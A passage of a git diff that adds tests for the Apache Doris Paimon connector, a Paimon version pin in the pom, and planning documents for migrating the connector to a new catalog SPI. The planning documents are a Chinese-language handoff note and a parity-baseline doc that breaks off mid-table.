user-run). + * + *

Complements the offline {@link PaimonConnectorMetadataTest}: this one confirms a real + * {@link org.apache.paimon.catalog.Catalog} built from {@link PaimonConnector} can actually + * be reached and listed through the production seam. It is skipped unless + * {@code PAIMON_WAREHOUSE} is set, so it is inert in CI and never hard-codes a warehouse. + * + *

+ *   PAIMON_WAREHOUSE=/path/to/warehouse [PAIMON_CATALOG_TYPE=filesystem] \
+ *   mvn -pl :fe-connector-paimon test -Dtest=PaimonLiveConnectivityTest
+ * 
+ */ +public class PaimonLiveConnectivityTest { + + @Test + public void liveMetadataRoundTrip() { + String warehouse = System.getenv("PAIMON_WAREHOUSE"); + Assumptions.assumeTrue(warehouse != null && !warehouse.isEmpty(), + "skipped: set PAIMON_WAREHOUSE (and optionally PAIMON_CATALOG_TYPE) to run live"); + + String catalogType = System.getenv("PAIMON_CATALOG_TYPE"); + + Map props = new HashMap<>(); + props.put(PaimonConnectorProperties.WAREHOUSE, warehouse); + if (catalogType != null && !catalogType.isEmpty()) { + props.put(PaimonConnectorProperties.PAIMON_CATALOG_TYPE, catalogType); + } + + // Exercise the full production path: PaimonConnector lazily builds a real Catalog and + // wires the CatalogBackedPaimonCatalogOps seam into the metadata. One listDatabaseNames + // round-trip confirms the catalog is reachable end to end. + try (PaimonConnector connector = new PaimonConnector(props)) { + ConnectorMetadata metadata = connector.getMetadata(null); + Assertions.assertNotNull(metadata.listDatabaseNames(null), + "a reachable Paimon catalog must return a (possibly empty) database list"); + } catch (Exception e) { + throw new AssertionError("live Paimon round-trip failed for warehouse " + warehouse, e); + } + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableSerdeRoundTripTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableSerdeRoundTripTest.java new file mode 100644 index 00000000000000..285ef6784b9268 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableSerdeRoundTripTest.java @@ -0,0 +1,193 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.catalog.Catalog; +import org.apache.paimon.catalog.FileSystemCatalog; +import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.fs.local.LocalFileIO; +import org.apache.paimon.schema.Schema; +import org.apache.paimon.table.Table; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.InstantiationUtil; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.junit.jupiter.api.io.TempDir; + +import java.nio.charset.StandardCharsets; +import java.nio.file.Path; +import java.util.Arrays; +import java.util.Base64; +import java.util.Collections; + +/** + * Offline FE->BE serialized-{@link Table} round-trip smoke for the Paimon connector. + * + *

This pins the exact wire mechanism the FE uses to ship a Paimon {@code Table} to BE for the + * JNI reader: {@code PaimonScanPlanProvider.encodeObjectToString} serializes the live table with + * {@link InstantiationUtil#serializeObject(Object)} and base64-encodes the bytes with the STANDARD + * {@link Base64#getEncoder()} into the {@code paimon.serialized_table} property + * ({@code PaimonScanPlanProvider} ~:213). BE reverses it ({@code PaimonUtils.deserialize}): URL-safe + * {@link Base64#getUrlDecoder()} first, STANDARD {@link Base64#getDecoder()} fallback, then + * {@link InstantiationUtil#deserializeObject(byte[], ClassLoader)}, running the IDENTICAL paimon + * 1.3.1 jar (R-007 — see fe/pom.xml {@code }). A version drift, a newly + * non-serializable field on the table, or a base64-variant mismatch would silently break BE + * deserialization at runtime; this catches it in CI. + * + *

Why this is a faithful simulation and not a fake: it builds a REAL local-filesystem Paimon + * catalog (paimon-core ships a local {@code FileIO}, so no hadoop is needed) under a JUnit + * {@link TempDir}, creates a real database + a real partitioned/keyed table via a valid + * {@link Schema}, resolves it with {@code catalog.getTable(Identifier)} (the same call the + * connector metadata makes) to get a real {@code FileStoreTable}, then serializes/deserializes it + * through the connector's mechanism — the decode reproduces BE's {@code PaimonUtils.deserialize} + * branch (URL-safe decoder first, STANDARD fallback) to prove the object graph reconstitutes from + * raw classes on the same path BE actually runs. + * + *

Fully offline — runs in CI, NOT env-gated (contrast {@link PaimonLiveConnectivityTest}). + */ +public class PaimonTableSerdeRoundTripTest { + + private static final String DB = "rt_db"; + private static final String TBL = "rt_tbl"; + + // --- the EXACT connector wire mechanism (PaimonScanPlanProvider.encodeObjectToString) --- + + /** FE side: serialize + STANDARD base64, identical to {@code encodeObjectToString}. */ + private static String feEncode(Object obj) throws Exception { + byte[] bytes = InstantiationUtil.serializeObject(obj); + return new String(Base64.getEncoder().encode(bytes), StandardCharsets.UTF_8); + } + + /** + * BE side: mirrors {@code PaimonUtils.deserialize} in be-java-extensions/paimon-scanner. BE + * tries the URL-safe decoder FIRST and falls back to the STANDARD decoder on + * {@link IllegalArgumentException} (the URL-safe decoder rejects the '+'/'/' a STANDARD payload + * may contain, which is exactly what triggers the fallback), then deserializes with the + * scanner's own classloader. Reproducing that branch here keeps the smoke faithful to the real + * BE decode path rather than just the STANDARD leg. + */ + private static T beDecode(String encoded) throws Exception { + byte[] enc = encoded.getBytes(StandardCharsets.UTF_8); + byte[] bytes; + try { + bytes = Base64.getUrlDecoder().decode(enc); + } catch (IllegalArgumentException urlReject) { + bytes = Base64.getDecoder().decode(enc); + } + return InstantiationUtil.deserializeObject(bytes, PaimonTableSerdeRoundTripTest.class.getClassLoader()); + } + + private static Catalog buildLocalCatalog(Path warehouse) { + // A real FileSystemCatalog over paimon's bundled LocalFileIO — this is exactly the catalog + // CatalogFactory.createCatalog builds for a file:// warehouse (the production + // PaimonConnector.createCatalog path: Options{warehouse=file://...} -> filesystem flavor -> + // FileSystemCatalog(LocalFileIO, warehousePath)). We construct it directly here only to keep + // the test classpath hadoop-free: CatalogContext.create(Options) statically references + // org.apache.hadoop.conf.Configuration, which is present in fe-core at runtime but is NOT a + // dependency of the connector test module. The resolved Table and the serde under test are + // identical either way — the catalog wrapper is not what this smoke exercises. + org.apache.paimon.fs.Path warehousePath = new org.apache.paimon.fs.Path(warehouse.toUri()); + return new FileSystemCatalog(LocalFileIO.create(), warehousePath); + } + + private static Schema partitionedKeyedSchema() { + // Partitioned + primary-keyed table. Paimon requires every partition field to also be a + // primary-key field, and a keyed table needs a fixed bucket count. + return Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("dt", DataTypes.STRING()) + .column("region", DataTypes.STRING()) + .column("val", DataTypes.BIGINT()) + .partitionKeys("dt") + .primaryKey("id", "dt") + .option("bucket", "2") + .build(); + } + + @Test + public void serializedTableRoundTripsThroughConnectorMechanism(@TempDir Path warehouse) throws Exception { + Table original; + try (Catalog catalog = buildLocalCatalog(warehouse)) { + catalog.createDatabase(DB, false); + Identifier id = Identifier.create(DB, TBL); + catalog.createTable(id, partitionedKeyedSchema(), false); + // The same resolution the connector metadata does: catalog.getTable(Identifier) -> a + // real FileStoreTable instance (NOT a hand-rolled double). + original = catalog.getTable(id); + } + + // Sanity: we are exercising a genuine resolved table, not a stub. + RowType originalRowType = original.rowType(); + Assertions.assertEquals(Arrays.asList("id", "dt", "region", "val"), + originalRowType.getFieldNames(), + "precondition: resolved a real partitioned/keyed FileStoreTable to serialize"); + Assertions.assertEquals(Collections.singletonList("dt"), original.partitionKeys()); + Assertions.assertEquals(Arrays.asList("id", "dt"), original.primaryKeys()); + + // FE encodes for the wire exactly as the connector ships it to BE. + String wire = feEncode(original); + Assertions.assertFalse(wire.isEmpty(), "encoded table payload must not be empty"); + + // BE reconstitutes the table from the same payload, running the identical paimon 1.3.1. + Table roundTripped = beDecode(wire); + + // WHY rowType()/partitionKeys()/primaryKeys() are the load-bearing identity: BE's JNI + // reader rebuilds its scan + schema-projection off exactly these from the deserialized + // table. If serialization drops or mangles them (non-serializable field, version drift, + // base64 variant mismatch) the BE read silently returns wrong columns/rows. MUTATION: + // swapping Base64.getEncoder() for getUrlEncoder(), or skipping InstantiationUtil, breaks + // the decode -> red. + Assertions.assertEquals(originalRowType.getFieldNames(), + roundTripped.rowType().getFieldNames(), + "round-tripped table must preserve column names/order"); + Assertions.assertEquals(originalRowType.getFieldTypes(), + roundTripped.rowType().getFieldTypes(), + "round-tripped table must preserve column types"); + Assertions.assertEquals(original.partitionKeys(), roundTripped.partitionKeys(), + "round-tripped table must preserve partition keys (partition pruning depends on this)"); + Assertions.assertEquals(original.primaryKeys(), roundTripped.primaryKeys(), + "round-tripped table must preserve primary keys (bucketing/keyed read depends on this)"); + } + + @Test + public void standardBase64LegRoundTripsSerializedBytesVerbatim(@TempDir Path warehouse) throws Exception { + // Locks the byte-level STANDARD base64 leg in isolation: the FE encoder (Base64.getEncoder, + // STANDARD) produces a payload that a STANDARD decoder reconstitutes byte-for-byte. BE + // decodes by trying the URL-safe decoder first; getUrlDecoder() THROWS + // IllegalArgumentException on a '+'/'/' it cannot accept (it does not silently corrupt), + // which is precisely what triggers BE's STANDARD fallback (see beDecode). This test pins the + // STANDARD leg that fallback lands on; the object-level round trip above covers the full + // BE decode branch. + Table original; + try (Catalog catalog = buildLocalCatalog(warehouse)) { + catalog.createDatabase(DB, false); + Identifier id = Identifier.create(DB, TBL); + catalog.createTable(id, partitionedKeyedSchema(), false); + original = catalog.getTable(id); + } + + byte[] raw = InstantiationUtil.serializeObject(original); + String standard = new String(Base64.getEncoder().encode(raw), StandardCharsets.UTF_8); + byte[] decoded = Base64.getDecoder().decode(standard.getBytes(StandardCharsets.UTF_8)); + + // The STANDARD round-trip must reproduce the byte stream verbatim. + Assertions.assertArrayEquals(raw, decoded, + "STANDARD base64 must round-trip the serialized table bytes verbatim"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java new file mode 100644 index 00000000000000..1eefa4e1fe7380 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java @@ -0,0 +1,88 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.catalog.Catalog; +import org.apache.paimon.catalog.Database; +import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.table.Table; + +import java.util.ArrayList; +import java.util.List; + +/** + * Hand-written recording fake for {@link PaimonCatalogOps} (no Mockito), mirroring the + * maxcompute connector's recording {@code McStructureHelper}. + * + *

Records an ordered call log, returns configurable fixed data, and can be told to throw + * the paimon {@code DatabaseNotExistException} / {@code TableNotExistException} that the + * production code catches. Because the seam fully covers every remote call + * {@link PaimonConnectorMetadata} makes, the metadata under test is built with a {@code null} + * real Catalog — the test stays entirely offline. + */ +final class RecordingPaimonCatalogOps implements PaimonCatalogOps { + + final List log = new ArrayList<>(); + + List databases = new ArrayList<>(); + List tables = new ArrayList<>(); + Table table; + + boolean throwDatabaseNotExist; + boolean throwTableNotExist; + + @Override + public List listDatabases() { + log.add("listDatabases"); + return databases; + } + + @Override + public Database getDatabase(String name) throws Catalog.DatabaseNotExistException { + log.add("getDatabase:" + name); + if (throwDatabaseNotExist) { + throw new Catalog.DatabaseNotExistException(name); + } + // databaseExists ignores the returned Database (only the throw/no-throw matters), + // so a null is sufficient and keeps the fake free of a Database double. + return null; + } + + @Override + public List listTables(String databaseName) throws Catalog.DatabaseNotExistException { + log.add("listTables:" + databaseName); + if (throwDatabaseNotExist) { + throw new Catalog.DatabaseNotExistException(databaseName); + } + return tables; + } + + @Override + public Table getTable(Identifier identifier) throws Catalog.TableNotExistException { + log.add("getTable:" + identifier.getFullName()); + if (throwTableNotExist) { + throw new Catalog.TableNotExistException(identifier); + } + return table; + } + + @Override + public void close() { + log.add("close"); + } +} diff --git a/fe/pom.xml b/fe/pom.xml index 8b65673e1d5fb1..e08c17d35d1cdc 100644 --- a/fe/pom.xml +++ b/fe/pom.xml @@ -396,6 +396,13 @@ under the License. 2.3.2 2.0.3 + 1.3.1 3.4.4 diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 3b1191bcb5fad4..cffb3366c8ae3c 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,47 +5,46 @@ --- -# 🔥 2026-06-09 — P5 paimon recon + 设计完成;下一步 = 分批实现(B0 起) +# 🔥 2026-06-09 — P5 paimon B0 完成(测试基建 + parity baseline);下一步 = B1(flavor 装配) -> **本 session**:用户要求对 paimon 5 功能区(普通表读取 / 系统表读取 / procedure / DDL / mtmv)在旧框架的实现做全面 code-grounded 分析,映射到新 catalog SPI 框架设计,并对齐 maxcompute 连接器接口一致性。**本 session 仅调研 + 设计,0 产线代码。** +> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B0**(T01 测试基建 + T02 parity baseline)。subagent-driven(每任务 implement→spec-review→quality-review + 主线 firsthand 复跑构建)。**B0 是 P5 首个产线代码批次**;B1–B9 待续。 -## ✅ 本 session 已完成 +## ✅ 本 session 已完成(B0 = T01 + T02) -- **14-agent workflow recon + cross-cut 对抗复审**(5 区 fe-core 旧实现 + 新 SPI 面 + MC 样板 + 连接器现状 → 5 区 old→new 设计 → 跨切面 critic),主线 firsthand 核 4 个 load-bearing 锚点(SPI_READY_TYPES / GSON 7 注册 / PluginDrivenExternalTable 无 MTMV / ConnectorPartitionInfo.lastModifiedMillis 已存在)。 -- **产物 1**:[`research/p5-paimon-migration-recon.md`](./research/p5-paimon-migration-recon.md) —— 5 功能区旧实现 + E1–E10 SPI 状态 + 跨切面风险 + **MC 一致性 11 约定** + 测试基线 + 沿用坑。 -- **产物 2**:[`tasks/P5-paimon-migration.md`](./tasks/P5-paimon-migration.md) —— old→new 映射表 + **30 TODO 分 B0–B9 批** + 批次依赖图 + 验收标准 + 开放决策(已签字)。 -- **doc 同步**:`connectors/paimon.md`(修 3 stale 表述)、`decisions-log.md`(+D-037/D-038,计数 36→38)、`PROGRESS.md`(header/§一/§二/§三/§四/§六/§七)、本 HANDOFF(覆盖)、auto-memory `catalog-spi-p5-paimon-design`。 +- **T01(测试基建 + seam)**:抽 `PaimonCatalogOps` 注入式 seam(**5 读方法**:listDatabases/getDatabase/listTables/getTable/close,B0 只读)over 远端 paimon `Catalog`;`PaimonConnectorMetadata` **6 调用点齐迁**(读路径字节级不变,`Catalog` import 仅留两 NotExist catch);`PaimonConnector` 装配 `CatalogBackedPaimonCatalogOps`。建 `fe-connector-paimon` **首个测试模块**(MC `McStructureHelper` 范式,no-mockito):`RecordingPaimonCatalogOps` + `PaimonConnectorMetadataTest`(9 UT,钉 `databaseExists` try/catch→bool + `getColumnHandles` reload-fallback,各带 WHY+MUTATION 注释)+ `FakePaimonTable`(28 非读方法 fail-loud)+ env-gated `PaimonLiveConnectivityTest`。 +- **T02(parity baseline)**:① **R-007 版本三方已对齐**(`${paimon.version}=1.3.1` 单源 `fe/pom.xml:399`;FE 连接器 + BE paimon-scanner + preload-extensions 同源)→ 落不变式注释(**非改版本/非加 enforcer**)。② offline FE→BE serde round-trip smoke `PaimonTableSerdeRoundTripTest`:真 `FileSystemCatalog`/`LocalFileIO`@TempDir → 真 `FileStoreTable` → 连接器 encode(InstantiationUtil+STD Base64,镜像 `PaimonScanPlanProvider.encodeObjectToString`)→ BE-side decode(镜像 `PaimonUtils.deserialize` **URL-first/STD-fallback**)→ 断 rowType/partition/primary keys;CI 跑、**非** env-gated。③ parity-baseline doc [`research/p5-paimon-parity-baseline.md`](./research/p5-paimon-parity-baseline.md)。 +- **验证(主线 firsthand)**:连接器 `Tests run: 12, Failures: 0, Errors: 0, Skipped: 1`(1 skip=live)+ **BUILD SUCCESS** + checkstyle 0 + import-gate 净。每任务 spec+quality 双审 PASS;主线追加 3 处准确性修正后复绿(见下「准确性修正」)。 +- **doc 同步**:`tasks/P5-paimon-migration.md`(T01→✅、T02→✅、元信息→进行中、阶段日志 +B0 条、当前阻塞项更新)、`fe/pom.xml`(R-007 注释)、本 HANDOFF(覆盖)。 -## 👤 用户签字决策(2026-06-09) +## 🧠 核心发现 / 纠偏(影响后续批次) -- **D-037(P5-D1,flavor 模型)= A 单 Catalog + flavor switch**:6 flavor(hms/filesystem/dlf/rest/jdbc) 在 `PaimonConnector.createCatalog` 内 switch on `paimon.catalog.type`,拷 warehouse/conf/S3-normalize + 重建 Hadoop·HiveConf + **每-flavor ExecutionAuthenticator** 入模块(MC 一致)。**不**建 backend 模块(5 个 `fe-connector-paimon-backend-*` 是空壳)。 -- **D-038(P5-D2,MTMV/MVCC scope)= A P5 内实现桥**:fe-core 新建 `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现 MTMVRelatedTableIf/MTMVBaseTableIf/MvccTable + 首个真 E5 消费者 override `beginQuerySnapshot` 三方法。**翻闸(B7) gated on MTMV 桥(B5)**;**禁**静默读 latest 回归。 +1. **R-007 三方版本已对齐**(非待修):单 `${paimon.version}=1.3.1` 属性即真源;删 legacy 后(B8)仍须验 paimon-core FE classpath 恰一份。 +2. **parity baseline 早已存在**(证伪 recon「无 baseline」):**41 套**回归(33 p0 + 6 p2 flavor + 3 MTMV + fe-core `PaimonScanNodeTest`)今跑 legacy `PaimonScanNode`,**翻闸(B7)后同套自动变 connector-SPI after 门**——无须新写「after」套。真 gap = 连接器侧 UT(① `PaimonPredicateConverter` 无连接器测,legacy 侧已有 fe-core `PaimonPredicateConverterTest`;② native/deletion-vector 连接器分类断言;③ sys-table forced-JNI 断言)+ **live-e2e 硬门**(用户跑,CI 跳,flavor 套全 env-gated)。详见 parity doc §3。 +3. **seam B0 只读**:`PaimonCatalogOps` 故意不含 DDL;**B1–B3 须扩** createDb/dropDb/createTable/dropTable 并**同步** `CatalogBackedPaimonCatalogOps` + 测试 `RecordingPaimonCatalogOps`。 +4. **transient-Table reload BLOCKER 仍在**(T06/B2):`PaimonScanPlanProvider:95` 取 `getPaimonTable()` 无 null fallback、无 catalog 访问;序列化后 NPE。B2 须修(metadata 侧 `getColumnHandles` 已有 fallback 可参照)。 -## 🧠 核心发现(5 区 + 证伪 3 先验,连接器档原 stale) +## 🛠 准确性修正(主线在 quality-review PASS 后追加,已复绿) -1. **普通表读取**:最接近 MC 样板,scan 骨架近完工。补缺=transient-Table reload BLOCKER(`PaimonTableHandle:41/73` + `PaimonScanPlanProvider:95` 无 fallback)、session-TZ 谓词 bug(`PaimonPredicateConverter:284` 固定 UTC)、`listPartitions*`、6-arg planScan。 -2. **系统表读取**:须**新建 E7 SPI hook**(greenfield,paimon 首个消费者)+ 通用 `PluginDrivenSysExternalTable`(**必须报 PLUGIN_EXTERNAL_TABLE**,否则路由到将删的 legacy 节点);binlog/audit_log 须按 sysName 强制 JNI(是 DataTable 走 native = 行错且静默)。 -3. **procedure**:**零可迁,doc-only no-op**(fe-core 无 paimon procedure;`expire_snapshots`=iceberg、`CALL paimon.sys.migrate_table`=Spark 两假阳性)。 -4. **DDL**:迁 `PaimonMetadataOps`→`PaimonConnectorMetadata`(连接器远端 + `PluginDrivenExternalCatalog` override edit-log)+ flavor 装配(D-037);**每-flavor authenticator 必须保**(否则 Kerberos DDL 炸);`DorisToPaimonTypeVisitor`→`PaimonTypeMapping` 反向(保留 legacy gap)。 -5. **mtmv**:SPI **MTMV 完全无面(E10 缺)** + paimon 首个真 E5 消费者;MTMV 类型留 fe-core 子类、SPI-neutral 数据经 E5 snapshotId + `ConnectorPartitionInfo.getLastModifiedMillis()`(已存在)。最高 correctness 风险=**单-pin 不变式 + GAP-LISTPART-AT-SNAPSHOT**(at-snapshot 列分区)。 -- **证伪 3 先验**:① backend 模块=空壳(非已建工厂,连接器走单 Catalog stub);② FE 分发部分已预接(DROP/CREATE·DROP DB/SHOW PARTITIONS/TVF,残留=连接器 listPartitions);③ Base64 非 blocker(BE `PaimonUtils:42-47` 有 STD fallback;真风险=pin paimon-core 三方版本对齐)。 +- `PaimonTableSerdeRoundTripTest.beDecode`:改为**真镜像 BE** `PaimonUtils.deserialize`(先 `getUrlDecoder` 再 STD fallback + scanner classloader),并修 javadoc 过度声明。 +- 第二测试 `base64VariantMustMatchBetweenEncodeAndDecode` → 重命名 `standardBase64LegRoundTripsSerializedBytesVerbatim`;修「corrupts」措辞为「throws→触发 BE STD fallback」。 +- parity doc §3.1:注明 legacy 转换器**已有**直接 fe-core UT(`PaimonPredicateConverterTest`),gap 精确化为「**连接器** converter 无测」。 -## 🎯 下一 session = P5 分批实现(B0 起) +## 🎯 下一 session = B1(flavor 装配,单 Catalog 模型;gated on D1=A 已签) -- **B0**(无前置):建 `fe-connector-paimon` 测试模块 + no-mockito 注入式 `PaimonCatalogOps` seam + parity baseline(vs 旧 `PaimonScanNode`)+ FE→BE round-trip smoke + **pin paimon-core 版本三方对齐**。 -- **B6**(独立):procedure doc no-op。 -- 续 **B1**(单 Catalog flavor 装配 + 每-flavor authenticator)→ **B2**(普通读补完)+ **B3**(DDL)→ **B4**(E7 sys-table + E5 MVCC)→ **B5**(MTMV 桥)→ **B7 翻闸**(gated on B2+B3+B4+B5 + live e2e)→ **B8 删 legacy** → **B9 回归**。批次依赖图见 [tasks/P5](./tasks/P5-paimon-migration.md)。 +- **B1**:T03 `PaimonConnector.createCatalog` flavor switch on `paimon.catalog.type`(warehouse/options/重建 Hadoop·HiveConf/**每-flavor `ExecutionAuthenticator`**;filesystem→hms→rest/jdbc/dlf 渐进)+ T04 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties` + T05 扩 `validateProperties`(flavor 合法性 fail-fast)。**每-flavor authenticator 丢=Kerberos DDL 炸**(无离线测覆盖)。 +- **B6**(procedure doc no-op,独立)可随时穿插落。 +- 批次依赖图 / 翻闸前置硬门见 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) §批次依赖。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`(**须 -am 连带 rebuild**)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 -- 连接器禁 import fe-core(import-gate `bash tools/check-connector-imports.sh`);session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。连接器测试无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、test 阶段不跑(单独 `checkstyle:check`)。 -- 翻闸 GSON **7 注册原子齐迁**(5 catalog + db + table,比 MC 多,[[catalog-spi-gson-migrate-all-three]] / [[catalog-spi-cutover-fe-dispatch-gap]]);删 legacy 后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 -- 分支 `branch-catalog-spi`(HEAD `e96037cf6aa` #64300);建议 off 最新 upstream 起新分支。未跟踪 scratch(`.audit-scratch/`/`conf.cmy/`/`*.bak`/`.claude/scheduled_tasks.lock`)勿提交。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**,裸 -pl 会因 `${revision}` 兄弟解析虚假失败);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`(-am 连带)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 +- 连接器禁 import fe-core(import-gate `bash tools/check-connector-imports.sh`);session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。连接器测试无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、绑 validate 阶段(`mvn test` 即跑;或单 `checkstyle:check`)。 +- 翻闸(B7)GSON **7 注册原子齐迁**(5 catalog + db + table,[[catalog-spi-gson-migrate-all-three]] / [[catalog-spi-cutover-fe-dispatch-gap]]);删 legacy(B8)后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 +- 分支 `catalog-spi-07-paimon`。**未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`(用户本地集群配置)。 ## 🧠 给下一个 agent 的 meta -- **D-037/D-038 已签字** —— 直接按设计 doc 的 B0–B9 落地,无须重开 scope 讨论。 -- **live e2e(真实 paimon 各 flavor 环境)仍是翻闸真正完成门**(CI 跳),翻闸前须用户验。 -- **MTMV 单-pin 不变式**是最高 correctness 风险,B5 必须一次物化分区集 + at-snapshot listPartitions;`lastFileCreationTime()` 跨 flavor 可靠性须 live 验。 -- auto-memory:[[catalog-spi-p5-paimon-design]](本 session 决策 + 3 证伪先验索引)。 +- **D-037/D-038 已签字**,B0 已落 —— 直接按设计 doc B1→B9 续,无须重开 scope。 +- **live e2e(真实 paimon 各 flavor 环境)仍是翻闸真正完成门**(CI 跳),翻闸前须用户验;parity doc §4 有 run plan。 +- **MTMV 单-pin 不变式**(B5)是最高 correctness 风险;`lastFileCreationTime()` 跨 flavor 可靠性须 live 验。 +- auto-memory:[[catalog-spi-p5-paimon-design]](设计决策 + 3 证伪先验索引)。 diff --git a/plan-doc/research/p5-paimon-parity-baseline.md b/plan-doc/research/p5-paimon-parity-baseline.md new file mode 100644 index 00000000000000..0ce4508c4ee582 --- /dev/null +++ b/plan-doc/research/p5-paimon-parity-baseline.md @@ -0,0 +1,160 @@ +# P5 Paimon — Parity Baseline (before/after cutover) + +> Task: **P5-T02** (batch B0). Companion to the FE→BE round-trip smoke + the 3-way +> `paimon.version` pin (R-007). This doc is the **parity contract** for the paimon +> connector-SPI migration: it enumerates the existing regression coverage firsthand, states +> WHY no new "after" suite needs to be authored, and flags the real gaps that DO need new +> coverage or a live-e2e hard gate. +> +> Grounding date: 2026-06-09. All suite paths verified firsthand under +> `regression-test/suites/`. Numbers below are from direct enumeration, not estimates. + +--- + +## 1. Cutover-gate model — why the SAME suites are the before/after parity gate + +The paimon read path today runs through the **legacy `PaimonScanNode`** +(`fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonScanNode.java`). + +Cutover (batch **B7**) is a single switch: add `"paimon"` to `SPI_READY_TYPES` in +`fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java:51-52` (today +`{"jdbc","es","trino-connector","max_compute"}`). Once paimon is in that set, +`createCatalog` builds a `PluginDrivenExternalCatalog` backed by the SPI connector instead +of the legacy `PaimonExternalCatalog`, and the read path flows through the connector's +`PaimonScanPlanProvider` instead of `PaimonScanNode`. + +**Consequence:** every regression suite below runs unchanged. Before B7 it exercises the +legacy path; after B7 the IDENTICAL suite exercises the connector-SPI path. The suites are +therefore the **before/after parity gate by construction** — run them on master (legacy), +then on the cutover branch (SPI), and diff the `.out` results. No separate "connector-path" +regression suite needs to be authored; authoring one would just duplicate these. + +This mirrors how P4 maxcompute was gated (see `tasks/P5-paimon-migration.md` §当前阻塞项 +"翻闸前置硬门 ③ B0 parity baseline 绿"). + +--- + +## 2. Parity dimension → covering suite(s) → status + +Legend — **Status**: ✅ covered by automated regression that flips at cutover; ⚠️ partial +(only one side of a toggle, or behind an env that CI skips); ❌ no automated coverage (real +gap, see §3). All suites are tagged `p0,external` (the `external_table_p0/paimon/**` group) +unless noted P2. + +| # | Parity dimension | Covering suite(s) | Status | +|---|---|---|---| +| 1 | SELECT * no-predicate | `test_paimon_catalog`, `test_paimon_table`, `paimon_base_filesystem` | ✅ | +| 2 | Predicate pushdown (explain + row correctness) | `test_paimon_predict` (per-column `explain{}` + qt row checks), `paimon_base_filesystem` | ✅ (legacy converter) / ❌ (connector `PaimonPredicateConverter` UT — see §3.1) | +| 3 | Partition pruning | `test_paimon_partition_table`, `paimon_partition_legacy` | ✅ | +| 4 | Runtime-filter partition pruning | `test_paimon_runtime_filter_partition_pruning` | ✅ | +| 5 | Native (ORC/Parquet) vs JNI split classification | `test_paimon_cpp_reader` (toggles `enable_paimon_cpp_reader` false→true), `paimon_tb_mix_format`, `test_paimon_deletion_vector` (loops `force_jni_scanner` **false AND true**) | ⚠️ — native path IS exercised, but only via the *legacy* split classifier; the **connector** native/JNI classification has no dedicated assertion (see §3.2) | +| 6 | Deletion vector | `test_paimon_deletion_vector` (orc+parquet, `force_jni` false+true), `test_paimon_deletion_vector_oss` (P2/env) | ✅ for legacy; ⚠️ connector deletion-file plumbing un-asserted (see §3.2) | +| 7 | COUNT pushdown | `test_paimon_count` (append + merge-on-read), `test_paimon_deletion_vector` count-pushdown block | ✅ | +| 8 | Incremental read | `paimon_incr_read` (parameterized 